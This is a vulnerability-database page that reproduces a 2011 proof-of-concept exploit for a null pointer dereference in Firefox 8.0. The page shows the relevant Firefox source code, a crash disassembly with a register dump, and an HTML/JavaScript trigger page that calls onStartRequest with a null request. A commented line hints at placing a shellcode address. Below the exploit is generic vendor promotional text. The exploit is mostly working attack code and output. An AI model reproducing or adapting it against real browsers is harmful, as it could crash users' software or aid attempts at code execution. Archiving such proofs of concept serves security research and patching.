Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mozilla Firefox 8.0 Null Pointer Dereference

🗓️ 14 Nov 2011 00:00:00Reported by 0inType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 15 Views

Mozilla Firefox 8.0 Null Pointer Dereference exploi

Code
`# Firefox <= 8.0 null pointer dereference PoC exploit  
# Author: 0in (Maksymilian Motyl)  
# Tested on Firefox 8.0/4.0 on windows and Firefox 7.1 on Linux  
# Lets see in code:  
# $ cat ./mozilla-release/content/base/src/nsObjectLoadingContent.cpp  
  
NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,  
nsISupports *aContext)  
{  
if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there  
return NS_BINDING_ABORTED;  
}  
AutoNotifier notifier(this, PR_TRUE);  
  
if (!IsSuccessfulRequest(aRequest)) { // go  
  
  
//----------------------------------------------------------------------------------  
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)  
{  
nsresult status;  
nsresult rv = aRequest->GetStatus(&status); // Code execution is here.  
  
// ---------------------------------------------------------------------------------  
  
  
DUMP:  
014E7A28 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]  
014E7A2B 8B07 MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000  
014E7A2D 8D4D FC LEA ECX,DWORD PTR SS:[EBP-4]  
014E7A30 51 PUSH ECX  
014E7A31 57 PUSH EDI  
014E7A32 FF50 14 CALL DWORD PTR DS:[EAX+14]  
  
EAX 0012BFC0  
ECX 00080000  
EDX 00080000  
EBX 03A199E8  
ESP 0012BF44  
EBP 0012BF54  
ESI 03A199C0  
EDI 00000000  
EIP 014E7A2B xul.014E7A2B  
  
$ cat 2011_powrot_komuny.html  
<html>  
<body>  
  
<object id="dupa">  
<script>  
RIINDC=document.getElementById("dupa");  
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);  
//RIINDC.mchannel=SHELLCODE_ADDR  
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));  
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));  
  
</script>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Nov 2011 00:00Current
0.4Low risk
Vulners AI Score0.4
firefox 8.0null pointer dereferenceexploitwindowslinuxobject loading contentcode execution
15